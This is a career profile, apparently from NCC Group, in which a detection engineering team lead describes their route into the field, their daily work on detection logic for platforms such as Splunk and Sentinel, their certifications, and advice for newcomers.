Introduction
I lead the Detection Engineering team in the UK at NCC Group. My team works on detection logic across various security platforms to identify potential cyber threats across multiple customers’ environments.
Background
But how did I become a detection engineer?
I think the best way to put it is that I “fell” into it.
I was studying Computer Science and Mathematics at the University of Manchester, which included a year of industrial experience as part of the role. Like most computer science students, I applied for a lot of software engineering placements, and eventually got offered one at BAE Systems Applied Intelligence. Shortly before I was supposed to start, I was contacted by a senior manager there asking if I wanted to try working with their team of “Cyber Security Data Scientists” because they thought I would be a good fit due to my background in computer science and mathematics. I said, “why not?” and I’ve been working in threat detection ever since.
A Day in the Life of a Detection Engineer
A typical day in the life of a detection engineer at NCC entails researching, writing and testing new detections for the various security platforms we work with including – but not limited to – Splunk, Sentinel and Defender for Endpoint.
We also work closely with the SOC analyst team to improve existing detection logic so that we can keep the alert volumes manageable for the SOC.
More senior detection engineers will typically get a bit more involved in activities such as identifying and prioritising detection opportunities, and advising customer-facing teams during active breaches, the onboarding process or purple teams.
My Career at NCC Group
I joined NCC Group 4 years ago, following a detection engineering role at Deloitte. I heard about the role through a university friend who had moved into NCC’s detection engineering team after working internally as a pen tester.
During my time at NCC Group, I have worked my way from being a Detection Engineer to a Senior Detection Engineer to leading the team.
Personal and Professional Growth
With cyber security and the threat landscape being ever changing, I have found not a day goes by at work where I don’t learn something new. Throughout my time here, I have had to work with new technologies and detection platforms, and research numerous tools, techniques and procedures. It’s definitely a great role for those who like to be adaptable and are eager to learn!
Certifications
During my time at NCC Group, I have found that there is a definite commitment to upskilling employees and supporting them at getting certifications. While there is not blanket approval for all certifications, if pursuing a certification that is relevant to your role, you are likely to be supported in your efforts.
Prior to working at here, I had no experience at all with some of the security platforms we work with such as Splunk, Sentinel and Defender for Endpoint. I was given the opportunity to take some Splunk courses and achieve the Splunk Core Certified Power User certification during the first 6 months of working here. I have also had opportunities to pursue AZ or SC certifications for the Microsoft stack – however I have yet to take advantage of this, mainly because I really don’t like exams.
Getting into Detection Engineering
There are many routes into Detection Engineering, such as previous experience in another security role, such as a SOC analyst or threat hunter, or a background in data science.
To be a detection engineer, it is important to be able to understand attack techniques and what logging and tooling (SIEM vs EDR vs NDR) can be used to detect them. You can build this foundational understanding through various courses and certifications, or through building your own home lab so that you can simulate the attacks yourself and detect them.